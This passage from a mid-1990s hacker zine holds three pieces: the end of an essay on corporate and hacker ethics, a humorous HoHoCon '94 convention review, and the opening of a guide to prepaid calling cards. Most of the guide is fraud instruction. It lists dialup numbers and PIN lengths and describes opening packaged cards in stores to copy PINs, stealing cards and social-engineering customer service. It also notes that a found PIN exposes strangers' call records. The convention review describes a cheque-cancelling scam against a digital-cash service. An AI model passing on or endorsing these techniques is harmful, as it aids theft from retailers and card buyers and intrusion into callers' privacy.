  12549. The judge has before him internal Microsoft documents which
  12550. indicate that the employee who came up with the idea of using
  12551. vaporware to combat new products from Borland was given the
  12552. highest possible ranking in his evaluation. The tactic apparently
  12553. worked to perfection. The suits have now told the judge it wasn't
  12554. vaporware, because Microsoft was actually working on such a
  12555. product.  The judge is not amused.  Are these crimes, this
  12556. dishonesty, somehow more acceptable because they are done
  12557. for profit by an industry giant?  Because they're done by
  12558. business men in suits instead of punk kids in jeans?
  12559.  
  12560. How about Ross Perot's old company, EDS.  Have the once
  12561. proud men and women of the red (tie), white (shirt), and blue
  12562. (suit) drifted astray since the days when 'the little guy' insisted
  12563. that not even a hint of impropriety was acceptable?  The state
  12564. employee that negotiated and signed the contract with EDS that
  12565. brought me to Austin in 1990 to install the statewide USAS
  12566. accounting system for the State Comptrollers Office was hired by
  12567. EDS as a 'special consultant' in 1992.  Hint of impropriety? This
  12568. was shouted from the roof-tops.  EDS bought a full-page ad in the
  12569. Austin American-Statesman to make sure that all the other
  12570. bureaucrats in state government got the message.
  12571.  
  12572. What about the cops?  The federal storm-troopers who
  12573. conducted the raids around town at the time of the Steve Jackson
  12574. affair.  The judge at that trial had dressed down the agent in
  12575. charge like he was talking to a teenage bully who had been
  12576. busted for taking candy from the other kids. No wonder the EFF
  12577. (Electronic Frontier Foundation) is so popular.  It's the ACLU of
  12578. the 90's and the uncharted terrain of cyber-space.
  12579.  
  12580. Finally, how about me.  I have the illegal software on my PC.  It's
  12581. a copy of Personal Editor II that I've had forever.  When I
  12582. worked at EDS I once had to code 250,000 lines of COBOL
  12583. using EDLIN. In those days, management didn't think PC's were
  12584. anything but toys and they would be damned before they spent
  12585. any money buying editors to write software for them.  Out of that
  12586. ordeal came an abiding disdain for EDLIN and my own copy of
  12587. PE II.  I'm not sure where I got it.  It was a legal copy at one
  12588. time, though I'm not sure whose it was. When I transferred to
  12589. Washington, D.C. in 1987, I took it with me.  I moved it from my
  12590. XT, to my AT, to my 386SX. Now it's own my 486DX2/50.  I had
  12591. a copy of it on every computer I used at work. I used it for
  12592. everything I coded, for all the notes I wrote.
  12593.  
  12594. These days I don't go into DOS unless I want to hear the guns
  12595. fire in Doom II. OS/2 comes with TEDIT, which looks enough
  12596. like an updated version of PE II to make me feel guilty every
  12597. time I see it.  But I haven't taken the time to learn how to use this
  12598. legal editor.  My taboo copy of PE II is much too comfortable.
  12599.  
  12600. So who are the good guys and who are the bad?  The suits who
  12601. steal and bribe and leverage from within the system?  The
  12602. arrogant thugs with badges?  The punks with body-piercings?
  12603. Or an old phart like me, with illegal software on my own PC?
  12604. Heady questions for sure.  I thought I knew the answer when I
  12605. started this column, now I'm not so sure. I can't condone the theft
  12606. of goods or services no matter how altruistic or noble the cause,
  12607. or how badly some noses need to be tweaked, or how ignoble
  12608. some agents of law enforcement.
  12609.  
  12610. I think it would be my style to point a finger first at the suits,
  12611. then at the kids.  But as long as I'm using stolen software, or
  12612. 'evaluating' shareware long after the trial period is over, I don't
  12613. have to go very far should I get the urge to set something right.
  12614.  
  12615.  
  12616. -----------------------------------------------------------------------------
  12617.  
  12618.                          Ho Ho Con '94 Review
  12619.  
  12620.                 by Onkel Dittmeyer (onkeld@netcom.com)
  12621.  
  12622.  
  12623.     " If I would arrest you, you would really be under arrest,
  12624.       as I am a real officer that can actually arrest people who
  12625.       are under arrest when I arrest them. "
  12626.                                    - Austin Cop, HoHoCon '94
  12627.  
  12628.  
  12629.     For those who missed it, dissed it or were afraid to go, here
  12630. comes my very personal impression on HoHoCon 1994...flames: /dev/null.
  12631.  
  12632.     Drunkfux did it again. K0de-kiddiez, WaReZ-whiners, UNIX-users,
  12633. DOS destroyers, linux lunatics - all of them found their way to the
  12634. Ramada South Inn in Austin, Texas to indulge in a weekend of excessive
  12635. abuse of information equipment and controlled substances under
  12636. supervision of the usual array of ph3dz, narqz, local authorities,
  12637. mall cops and this time - oh yes! - scantily clad Mexican nationals
  12638. without green cards in charge of hotel security. Tracy Lords, however,
  12639. did NOT show up.
  12640.  
  12641.                                (I want my money back.)
  12642.  
  12643.     Well.
  12644.  
  12645.     When I walked into the hotel, I noticed a large handwritten
  12646. poster that Novocaine put up in the lobby, marking his room as a
  12647. "hospitality suite" for those who already made it to Austin Thursday
  12648. night. I ditched my bags into my room and went up to the fifth floor to
  12649. see what was going on, and who was already there. Grayareas, Novocaine,
  12650. Eclipse, Dead Vegetable and a bunch of unidentified people were
  12651. lingering around a table that was cluttered with all kinds of
  12652. underground mags (from 2600 to Hack-Tic), some reading, some making up
  12653. new conspiracy theories. Everybody took a good whiff of Austin air and
  12654. prepared themselves for the action to come. Later that night, I took
  12655. Commander Crash for a walk around the hotel to see how well they did
  12656. their homework. The rumor was that the hotel had been notified, as well
  12657. as all local computer-oriented businesses, that the haqrz were in
  12658. the neighborhood.. and it looked like it was telling the truth. We
  12659. found not a single door unlocked, not one phone interface un-secured.
  12660. Somebody closed all the security h0lez in advance, therefore hacking
  12661. the hotel looked pointless and lame. Everybody crashed out,
  12662. eventually. For most, it was the last sleep they would get for the new
  12663. year's weekend.
  12664.  
  12665.     Noon the next day, I awoke to find the lobby crawling with
  12666. people, and ran into some familiar faces. Like last year, most of the
  12667. lobby-ists were playing with hand-held scanners. The National Weather
  12668. service was soon declared The Official HoHoConFrequency, and was - in
  12669. old fashion - blaring through all hallways and lounges of the site. At
  12670. least, nobody could claim they didn't know it was going to rain...
  12671.  
  12672.     Commander Crash approached me in the early afternoon. "Dude, "
  12673. he said, "I think I've got a bug on my scanner..". We went hunting
  12674. around the hotel with a signal-strength-indicator-equipped eleet
  12675. scanner to see if we could locate the little bastard. We couldn't.
  12676. Disappointed, we asked some cDc guys to help us look, and soon we
  12677. walked up and down the hallways in a mob of approximately fifteen to
  12678. twenty people. An "undercover" hotel security guard, clad in a "beefy
  12679. look" muscle-shirt that revealed some badly-sketched tattoos walked up
  12680. and advised us to "get our asses back to our rooms". "If there is a
  12681. bug in this hotel, it is there for a reason. Therefore, don't mess
  12682. with it." I asked him if we were grounded or something. He was kindly
  12683. ignored for the rest of the night. As the mob settled into the
  12684. check-in lounge, I noticed about half a dozen new security guards who
  12685. were hired to enforce Law & Order and just received an extra briefing
  12686. from the hotel manager in a back room. An Austin cop proceeded giving
  12687. each one of them an extra pair of handcuffs.  Somebody exclaimed "My
  12688. Lord, it's gonna be bondage-con!", which caused me to spray my soda
  12689. over an unsuspecting warez d00d. He called me a "LaMeR" and chased me
  12690. back to my room where I peacefully lost consciousness.
  12691.  
  12692.     The next morning, I awoke late while the actual con was already
  12693. in full swing. I pumped myself back into reality with a handful of
  12694. Maximum Strength Vivarine(TM) (thank god for small favors) and moved
  12695. my not-too-pleasant-smelling likeness into the con room, where
  12696. Douglas Barnes was in the middle of a rant on basic encryption. Very
  12697. basic, so to speak. Maybe because, like he said, he did not know "how
  12698. to address such a diverse audience consisting of hackers, security
  12699. professionals and federal agents". Hmpf! You fill in the blanks. Next
  12700. up was Jeremy Porter, going into the details of available digital cash
  12701. systems, and repeatedly pointing out how easy you can scam over
  12702. NetCash by faxing them a check and then cancelling it out after you
  12703. got your digicash string in the (e-) mail.  Up next, Jim McCoy gave a
  12704. talk on underground networking, a concept that enables you to run a
  12705. totally transparent and invisible network over an existing one like
  12706. the Internet. Very much like the firewall at whitehouse.gov..
  12707.  
  12708.     Damien Thorn was next, starting with some video footage he taped
  12709. off a news station where he is interviewed on cellular fraud through
  12710. cloning.  He also showed off a nice video clip that showed him playing
  12711. around with ESN grabbers an other quite k-rad equipment.  Ironically, he
  12712. chose "21st Century Digital Boy" from Bad Religion as the underlying
  12713. soundtrack.  That reeks of pure K-RaDiCaLnEsS, doesn't it? When dFx came
  12714. back to the mike, about 400 ranting and raving haqrz demanded for the
  12715. raffle to finally start, and the k-g0d (who wore a pair of weird,
  12716. green, pointed artfag boots) gave in. In the next thirty minutes or
  12717. so, a lot of eleet things found new owners like hard drives,
  12718. keyboards, twelve hour well-edited hotel porno videos, HoHoCon videos,
  12719. back issues of 2600 and TAP, a whole lot of HOPE t-shirts, a
  12720. Southwestern Bell payphone booth, CO manuals and other dumpster-diving
  12721. loot, AT&T Gift Certificates, an eleet 600 bps modem, and lots of
  12722. other more or less useful gadgets. Dead Vegetable repeatedly insisted
  12723. that he was not giving up the 35-pound "Mr. T." head he brought, which
  12724. was made of solid concrete and hand-painted. "No, it's a Mr-T-Phone,
  12725. you can pick up the mohawk and talk!"
  12726.  
  12727.     Back out in the lobby, I ran into erikb and chatted briefly
  12728. about some other Europeans we both knew (Hi 7up..)..  On the way
  12729. up to my room, I stopped at the 2nd floor lobby to mock somebody
  12730. for cigarettes. Well, see, I don't have anything against a huge
  12731. flock of ph3dz taking up the whole lobby, but if not a single one
  12732. of them smokes, let alone has a ciggy to spare, it pisses the fuck
  12733. out of me.  Back down, I crammed some fliers into my bag (Buy HoHoCon
  12734. videos/TAP issues/2600 subscriptions and other sellout), chatted with
  12735. Ophie and a couple of other IRC babes (a lot of females at the con
  12736. this year, if this trends keeps up, it will look like a Ricky Lake
  12737. show at next year's HoHoCon) and retreated back to my room to secure
  12738. all the nifty things I won at the raffle (a book of TAP issues,
  12739. a 2600 issue, two t- shirts, an acoustic coupler.. dFx looked
  12740. quite pissed).
  12741.  
  12742.     Back down, everybody that had something to sell had opened up
  12743. shop. dFx was selling last years "I LOVE FEDS/WAREZ" tee-shirts plus
  12744. a new stack of the elusive "I LOVE COPS" baseball caps, who came
  12745. in four different spanking colors this year. The embroidered logo is
  12746. the clincher. I can just recommend everyone who did not get one yet
  12747. to get their hands on one of these (no, I am not receiving any ca$h
  12748. for this). Netta Gilboa was auctioning off some back issues of
  12749. Gray Areas, and cDc sold everything from sizzling "Cult of the Dead C0w"
  12750. shirts and hats to "Please do not eat kids" stickers, cable TV descramblers
  12751. and DTMF decoders while happily zonking away on an old Atari 7800
  12752. video game.  While browsing through the merchandise, I ran into a guy
  12753. with a shirt that said "I quit hacking, phreaking, k0dez and
  12754. warez.....it was the worst 15 minutes of my life." Now THAT
  12755. would have been something to bring home! I blew my excess money on
  12756. some less original shirts and visited Room 518, where a bunch of
  12757. dedicated people had set up a Net connection and public-access
  12758. terminals. Some of the TTYs definitely looked like something you would
  12759. find if you decided to take a walk around the desolate offices of your
  12760. local CO at night..
  12761.  
  12762.     Midnight drew closer. When the new year came around, I was quite
  12763. shocked.  "Hey d00dZ! Happy New Year!" - "Shut Up!  I am about to get
  12764. op on #warez2!"  What a festive mood.  After midnight, everybody pretty
  12765. much retreated into a room with a fair quantity of their favorite
  12766. narcotic substance (the 4th floor was filled with an ubiquitous pot
  12767. smell, despite of the alarming presence of suits who were talking into
  12768. their jackets) and called it a day.
  12769.                               ==Phrack Magazine==
  12770.  
  12771.                  Volume Six, Issue Forty-Seven, File 13 of 22
  12772.  
  12773.  
  12774.                              Final : [o2/xx]
  12775.  
  12776.                  /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
  12777.            .xX- | - An Overview Of Prepaid Calling Cards - | -Xx.
  12778.                  \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
  12779.  
  12780.                           '95 - Second Update - '95
  12781.  
  12782.               - Second -BTR- Release - First -PAiN- Pak Release -
  12783.  
  12784.                            (c) 1995 Treason [518]
  12785.  
  12786.                                     by
  12787.  
  12788.                            treason@fpg.gcomm.com
  12789.  
  12790. - . - - . - - . - - . - - . - - . - - . - - . - - . - - . - - . - - . - - . -
  12791.            With A Special Thanks Going Out To Al K. Lloyd [4o4]
  12792.                   My Partner In Krime In The PCC World
  12793. - . - - . - - . - - . - - . - - . - - . - - . - - . - - . - - . - - . - - . -
  12794.          And Another Thanks Out To Me Bud Antediluvian [4o4]
  12795.                  For Enjoying PCCs And Knowing Some Too
  12796. - . - - . - - . - - . - - . - - . - - . - - . - - . - - . - - . - - . - - . -
  12797.  
  12798. In the past few months or so I have noticed that most places are
  12799. hopping on the Prepaid Calling-Card (PCC for short) bandwagon. PCCs
  12800. are a cheap alternative to normal long distance. (Or are supposed to be.)
  12801. For all of you that don't have any idea what a PCC is or how it works, here's
  12802. the full info:
  12803.  
  12804. Prepaid Calling-Cards are cards shaped like normal calling cards
  12805. and look exactly like them.  On their back, all PCCs have a 800 dialup,
  12806. a 9-12 digit code (give or take a few digits) and a customer service number
  12807. to report trouble.  All of these are sold in such a fashion that nosy phreaks
  12808. can't just read the backs and call the dialup and use it, without buying them.
  12809.  
  12810. PCCs almost always have calling limits.  Most available in the US are only
  12811. good within the US or US territories.  With certain cards, you have the
  12812. option to dial international but this will give you about 1-2 minutes of
  12813. actual usage on a 10 minute card, so I don't recommend calling Int'l
  12814. with these.  There are a few more restrictions blocking calls to any SAC.
  12815. (Special Area Code, like 700, 800, 900)  Domestic dialing is about all you
  12816. can do and still get your money's worth.  To sum it up, a PCC has a slotted
  12817. amount of time or dollar amount to use.  As far as getting a good deal goes,
  12818. you can't:  you break even, or you get ripped off.
  12819.  
  12820.  
  12821. PCC's are very easy to find.  They tend to turn up in the oddest
  12822. places.  You don't even have to look hard; they just pop out with banners,
  12823. signs and other various ads, so they are not hard to find. Some places
  12824. where I have found them are:  most grocery stores, some Toy Stores,
  12825. Greeting Card Shops, Quickee Marts, in packs of Sports cards and even at
  12826. Sporting good stores.
  12827.  
  12828. I thought this would be a particularly useful topic to write about due
  12829. to the fact anybody can benefit from these.  However, I'm not talking about
  12830. going to the store and buying them.  It doesn't take a genius to figure out
  12831. what to do with them.  They run a very simple system so anybody can use it.
  12832. (I mean, how hard is it to enter your digits when instructed?)
  12833.  
  12834. Most of these cards are basically copycats of each other.  They all have
  12835. some deal with a big long distance company.  After you enter the valid
  12836. number they tell you how much time is left on you card.  They all have an
  12837. operator that comes on just to tell you when 1 minute is left on your card.
  12838. (BTW, that fucks up any modem connection).  Plus, all of these services
  12839. run 800 numbers and are open 24 hours a day, 7 days a week.  Last but
  12840. not least, these don't show up on your phone bill.
  12841.  
  12842. Some people are set on never using stolen codes. (*cough*Emmanuel*
  12843. Goldstein*cough*cough)  But this is different since you're not really
  12844. stealing from any person by taking these.  You are not putting some
  12845. middle-class people from the Burbs out $20,000 like an abused calling card
  12846. that was passed around could.  So it's really not bad; besides, everybody's
  12847. doing it!
  12848.  
  12849. Hack 'em, Crack 'em, LD Pack 'em. Steal 'em, Deal 'em, Conceal 'em.
  12850.  
  12851.  ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
  12852.  
  12853. There's a new company called Talk 'N Toss.  They are offering a huge
  12854. variety of PCCs to chain stores that would buy a large amount for their
  12855. numerous stores.  Once a large company buys into this, they get set lines to
  12856. use for their card.  Then they customize them for their company name and
  12857. plugs.  I have seen Talk 'N Toss (TNT) sell 5, 10, 20, 30, 50, 80, 90 and 180
  12858. minute cards.  If you get a 90 minute card (or longer) that's the real jackpot.
  12859. 90 Minutes is the largest minute card I have ever seen them selling.
  12860. If you wish to place an order to sell them at "your" business, dial their
  12861. customer service hotline toll-phree at [800] 631-8895.  Plus I'm sure you
  12862. can SE the lady into getting free cards.  (I've done it once so I know that
  12863. it can be done.)  They claim that you save up to 38% from a normal AT&T
  12864. Call Card.  Bullshit maybe, but who the fuck knows.
  12865.  
  12866. I have seen these selling only two places.  The first is a grocery store
  12867. in Colorado (719 NPA) called Albertson's.  I don't know if this grocery
  12868. store is only located in Colorado, but that's where I happened to run into it.
  12869. I do not know the dialup or the proper amount of digits for this card.
  12870. It only sells in intervals of 30 and 90 minutes.  This is one of the few
  12871. cards with which you can call international.  For example, when calling
  12872. international they say that $1 of what you paid is equal to 3 LD minutes,
  12873. or about half a international minute...RIPOFF!
  12874.  
  12875. The other place I have seen TNT cards is Revco drugstore (formerly
  12876. Brooks Drugs.)  They have 10 minute card for $3.99 and a 20 minute card for
  12877. $9.99, 30 minutes for $14.99 and finally a 90 minute phone card goes for
  12878. a whopping $24.99.  Deal or not?  You decide.  If you decide you won't pay
  12879. for this crock of shit call 'em and hack 'em! At [800] 213-0304
  12880. with 10 digit PINs for their cards.  The time amount doesn't change the digit
  12881. amount. They have a CS number through which you can SE employees or just
  12882. complain to them at: [800] 354-2708.
  12883.  
  12884. Hello Direct, the phone supplies company, is offering their version
  12885. of TNT's PCC called the Prepaid Phone Card (PPC).  They're identical models
  12886. to the Revco TNT cards.  The dialup is [800] 955-2383 and the PINs are 9
  12887. digits.  These cards are the real jackpot with 180 minute cards for $50,
  12888. 80 minutes for $29 and 50 minute cards for $18.  These are by far the
  12889. best deals around.
  12890.  
  12891.  ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
  12892.  
  12893. Marvel Comics and Kay-Bee have put their heads together and are now
  12894. offering X-Men PCCs.  There's 2 things you can do with these cards.  The first
  12895. option you have is use it for 20 minutes of long distance (no international.)
  12896. The second option is to play some stupid X-Men game.  The game uses 4 minutes
  12897. (or units, as they call them) of your card.  You start with 20 units,
  12898. with each unit equivalent to 1 minute.  Basically the hot idea they have
  12899. to sell these is 4 different cards, each with supposedly famous X-Men 1 on 1
  12900. battle scene.  Plus they claim they are a limited edition.  Yeah, they may
  12901. be a limited edition but so is Phrack.  They have taken a little more security
  12902. than other cards by having a scratch off number on the back, so you can't
  12903. just pop off the outer plastic and see the PIN.  I find these to be some of
  12904. my favorite PCCs to use because you have 20 minutes, which is fairly decent,
  12905. plus they are easy to swipe.  I just go to my Kay-Bee toys and take a bunch
  12906. to the back and open them, and either steal the card or write down the number
  12907. and hide the card.  In a sick way, I find writing down the number more fun
  12908. because when someone finds it and thinks that they are hot shit by stealing
  12909. it they'll run into a nice message saying that they have no time left and
  12910. they can't do shit with it.  To further experiment call [800] 616-8883.
  12911. The cards are 9 digits long.
  12912.  
  12913.  ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
  12914.  
  12915. Champs Sporting Goods Store has a new deal whereby if you purchase over
  12916. $35 worth of sports shit you get a card for a free 7 minute call.  Technically,
  12917. it ain't free since you're buying merchandise.  Seven minutes basically ain't
  12918. worth your time, but if you can get it for free it's worth every minute.
  12919. You can usually get some dumbass clerk to let you look at the cards because
  12920. they keep them on the cash register.  One lady said to me, "Now don't pocket
  12921. that," as I was putting it into my pocket...oh well, dumbass.  The
  12922. number is [800] 437-6404.  With 9 digits for your PIN.
  12923.  
  12924.  ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
  12925.  
  12926. Randomly inserted into Classic 4-Sport sports cards are Sprint Prepaid
  12927. FoNCARDS.  Classic Games have joined with Sprint for numerous deals, this
  12928. being one.  Classic 4-Sport is a pack of sports cards that depict players
  12929. going to the pro's next year for 4 different sports. Those sports are
  12930. Baseball, Football, Basketball and Hockey.  Now, what the fuck would some
  12931. baseball card collector do with a Prepaid Foncard?  I still haven't figured
  12932. it out.  But some dealers tell me it's just another marketing thing because
  12933. collectors think they're a limited edition.  The cards are only worth $2
  12934. of LD anyway.  While the odds of finding a Sprint FoNCARD is 1:72.
  12935. (Which means 1 out of every 72 packs).  I know very little about this
  12936. since I haven't seen much out of them.  They do have a scratch off PIN on
  12937. the back.  To collectors, if the card has been scratched then the card
  12938. looses half of it's "value."  OOOOh scary.
  12939.  
  12940. Classic is trying to offer something to the collector again.  But
  12941. this time it's about real money.  Not opening a $1.50 pack of cards.  They're
  12942. now offering 1, 5, 10, 20 and 1000 dollar cards to dealers.  These are such a
  12943. hot commodity that the prices double every quarter!  I asked some ripoff
  12944. artist what the deal was on getting the cards.  He said that for a $1000
  12945. card you must pay a $750 down payment with a max order of 1.  On other
  12946. styles you have to order 18 cases to get them wholesale.  That's 108 total
  12947. cards.  I'm sure you can find them singular.  Try looking in your local
  12948. sports page for ads for Sportscard conventions...at those you can swipe them.
  12949.  
  12950. To fuck around with these, call up [800] 868-9871 with 10 digits to
  12951. get a set amount of time.
  12952.  
  12953.   ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
  12954.  
  12955.         Sports fans listen up once again. GTE is offering 25 minute PCCs
  12956. that look like actual calling cards. But with these cards you can order a PCC
  12957. with a professional football team logo and helmet located on the front of it. They call these
  12958. "NFL Collectables" they are called. But the minimum order is 2 cards. Plus
  12959. with each order you get sent a 5 minute bonus card that features helmets from
  12960. all 30 NFL teams on it. To order each card is only $14.75 but you have to get
  12961. 2. Call 1-800-GTE-3804 in the US. And outside the US call [303] 743-4138,
  12962. extension 712. Or just fax your order to [303] 727-4994. You must order these
  12963. with a credit card. I saw this add in Sports Illustrated.
  12964.  
  12965.  ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
  12966.  
  12967. This next one I would call my first love because it's what directed my
  12968. attention to the Prepaid Calling-Card field.
  12969.  
  12970. Hallmark is also working with Sprint to rip you off for that special occasion.
  12971. They started out printing normal greeting cards. (ie:  Happy Birthday,
  12972. Get Well, When Will You Finally Get Laid, etc...)  But then they got more
  12973. specific with their Christmas PCCs.  Now Valentine's Day is nearing and they
  12974. are selling Valentine's PCCs.  All of these cards are $5.95 for the card and
  12975. have 10 minutes of LD.  You can call anywhere in the US and its territories
  12976. (Virgin Islands, Puerto Rico), but no Int'l.
  12977.  
  12978. The main reason I fell in love with these is because of their mass
  12979. availability.  I have millions of Hallmarks in my area, and these cards are
  12980. easy to get for free.  These are greeting cards you just open like a normal
  12981. card.  They are poly-wrapped so they think you won't see the dialup & PIN,
  12982. but, DAMN, they're wrong.  The card has a cheap layer of glue on the middle
  12983. so if you free the card from it's gluey seal, you can pull the plastic back
  12984. to reveal the dialup and PIN.  I enjoy spending spare time going to Hallmark
  12985. getting the PINs, leaving the card behind so I can have the joy of someone
  12986. else buying the card and getting no time!!
  12987.  
  12988. There are 3 dialups for the 3 kinds of cards.  It doesn't matter what
  12989. dialup you use, all work for any card.  The first is the regular greeting for
  12990. the normal cards:  [800] 504-1115.  For the Happy Holidays greeting, call
  12991. [800] 203-1225.  The Valentine Line has a new and original message, which
  12992. for the first time says Sprint before Hallmark, at [800] 214-0214.  All of
  12993. these cards are 10 digits.
  12994.  
  12995. They have a Customer Service which is really just a branch of the large
  12996. Sprint CS, at [800] 516-2121.  The last fact about the Hallmark PCCs is
  12997. that their quality has become more flimsy with each new line of card.
  12998. For example, the first kind was hard like a normal PCC, but now the
  12999. Valentine's Day cards are shitty as hell...like a normal sheet of paper.
  13000.  
  13001. Hallmark also has this nifty little ANi thingee they use.  The computers
  13002. at Sprint know the PiN you used PLUS the number you called PLUS the
  13003. number you called from.  If you find a PiN just call up their Customer
  13004. Service and you can find out who people called and from what number.
  13005.  
  13006.   ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
  13007.  
  13008. Now we have the Pepsi-Cola company.  They are stupid asses who offer lousy
  13009. service, but help hackers.  They list the dialup on the back of the box!
  13010. The cards are randomly inserted in Pepsi Holiday 12 Packs.  Just go to any
  13011. Grocery Store and open the boxes looking for the cards.  This PCC would have
  13012. to claim the most money spent on advertising, since it is the only one with
  13013. a TV commercial.  Plus the cards are only good for 5 minutes of LD,  no Int'l.
  13014. The dialup is [800] 929-COLA (3642).  Once you call it says, "Enter Your
  13015. 14 Digit Code."  That's just asking to be ripped off.
  13016.  
  13017.  ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
  13018.  
  13019. 7-11, the slurpee guys, are now working with AT&T to bring you their
  13020. 7-11 Phone Cards.  It's supposed to save 50% or more than a LD collect call or
  13021. normal calling card. Obviously this is a big crock of shit.  On the brochure
  13022. it shows a data table comparing a 3 minute call from LA to NY.  It says a 7-11
  13023. Phone Card is $1.00, Collect Call is $3, a Payphone is $2.70, and a normal
  13024. calling card is $1.70.  I know when I call LD it's only like 15 cents so a
  13025. minute, not this ripoff.  They are available in 15, 30 or 60 minute cards.
  13026. I found a nice sales pitch on the brochure.  It says "After your time is used
  13027. up, the card becomes inactive and you just buy a new card!"  Yeah, right.
  13028. With this PCC you can call Int'l.  One main clue is that one side of the
  13029. brochure is all in Spanish.  But it says all calls must originate from within
  13030. the US.  (So you can't give them to your German friends and say they're real
  13031. Calling Cards.)  It warns you that since international rates vary a 15 minute
  13032. card could only be 5 minutes.  They don't actually give you that amount of
  13033. time; it depends entirely on where you call.  It's setup so you have a certain
  13034. amount of credit and once that's used, fuck how many minutes are left...your
  13035. time is up.  Remember, when you want a 7-11 card it is always best to ask
  13036. for Habib-Jabib.  I don't have any further info on these cards, like dialups
  13037. and shit.
  13038.  
  13039.  ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
  13040.  
  13041. Var-Tec Telecom, (10XXX = 10811) the new baby bell out of Texas, is
  13042. offering their version of PCCs called "Prepaid Phone Pass".  You can
  13043. dial their automated service and enter a string of numbers to order the
  13044. cards.  I know very little regarding this service, except you can order
  13045. cards specifically for Domestic or for International calls, or both.
  13046.  
  13047. Their automated service number is:  [800] 583-8811.  Once connected, enter
  13048. this string of numbers:  6, 2 then 1 (To Talk To Consultant) or 3
  13049. (For Orders).
  13050.  
  13051.  ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
  13052.  
  13053. PCCs are not only for LD; some people are actually collecting them.
  13054. No, not for any illegal services but as a hobby.  People like them for their
  13055. pretty pictures of designs or special events.  People are comparing this to
  13056. (*fun*) stamp and coin collecting.  So if there is a demand for new styles it
  13057. must be found in a catalog, and I've found that catalog...for a price:
  13058.  
  13059.         If you wish to order a 400 card catalog for $5 from :
  13060.  
  13061.                         Lin Overholt
  13062.                         PO Box 8481
  13063.                         Madeira Beach, FL 33738
  13064.  
  13065.         You can also purchase a publication entitled
  13066.  
  13067.                 "International Telephone Cards"
  13068.  
  13069.         by writing to :
  13070.  
  13071.                         29/35 Manor Road
  13072.                         Colchester, Essex CO3 3LX
  13073.                         Great Britain
  13074.  
  13075.  ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
  13076.  
  13077. Electronics Boutique, or EB for short, is offering PCCs with $5 worth
  13078. of LD on them.  Dialup is [800] 233-1363 with 9 digits PIN.  I know very,
  13079. little regarding these.
  13080.  
  13081.  ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
  13082.  
  13083. Shit From Al K. Lloyd [4o4]. Slightly Modified of course.
  13084.  
  13085. Since I've started collecting these suckers,
  13086. here's some other prepaids for you guys (Treason)
  13087. to add to the file in BTR:
  13088.  
  13089. - AT&T/Knights Inn [800] 357-PAID(7243) - 9 digits
  13090.   Customer Service is [800] 462-1818
  13091.   Glossy cardboard cards in 15 or 25 "units"
  13092.   These are sold at the hotel chain
  13093.  
  13094. - PrimeCall [800] 866-6915 - 14 digits
  13095.   But try starting with 407-xxxx-xxxx-xxx (just a hunch)
  13096.   Customer service [800] 938-4949
  13097.   Card is plastic in $10 and $20-I think only one design w/a bunch of flags
  13098.   on it; these guys are going for the international crowd (oddly enough,
  13099.   these are the only ones I've seen dispensed from a machine)
  13100.  
  13101. - Western Union [800] 374-8686 - 8 digits
  13102.   These guys charges are ridiculous--try them 1st...
  13103.   Customer Service is [800] 374-8686; the cards are thin cardboard to
  13104.   boot-$10, $20, or $50
  13105.  
  13106. - Caber Communications [800] 868-9871 - 10 digits
  13107.   Caber/Talk Lite [800] 429-9547 - 10 digits
  13108.   Customer Service is [800] 716-2444 or [404] 876-2444 (local to me)
  13109.   Some of the nicest cards I've seen; $5, $10, and $20
  13110.   Fairly good rates considering what there is to pick from (like Western
  13111.   Union)
  13112.  
  13113. These things keep popping up like mushrooms...
  13114. Caber's rates just look good compared to Western Union :>
  13115. Revco Talk n' Toss is the cheapest I've found so far...
  13116. only available here in 10, 30, and 100 min. To my knowledge.
  13117.  
  13118. Second cheapest is:
  13119. Transcommunications, Inc.
  13120. Transcard
  13121. 800-326-4880 11 digits
  13122. 800-772-7293 Customer Service
  13123.  
  13124. Cards are also available in Spanish,  in $10 & $20 denominations
  13125. (not marked on the card, cards can be recharged by CC @ 800-772-7293.)
  13126.  
  13127. I found this at a Conoco gas station; according to their C.S. they're
  13128. also available at various truck stops, Pilots, Kangaroos, and a bunch more.
  13129.  
  13130. I tell ya, I run into a new one of these every time I turn around...
  13131.  
  13132. Al
  13133.  
  13134.  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  13135.  
  13136. Regarding Caber PCCs :
  13137.  
  13138. Caber has sales reps that go to immigrant stores to unload the cards.  They
  13139. carry their inventory in business card folders that seem to carry 46 cards
  13140. or so.  If a folder got stolen, there is no way to tell who bought which card,
  13141. unless it was a fresh folder (in which case they'd just notify the Co.).
  13142.  
  13143.  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  13144.  
  13145. Caber Communications has 2 different kinds of cards, Caber and
  13146. Talk Lite.  I'll categorize these by line and amount.  (The following are
  13147. no longer valid cards.)
  13148.  
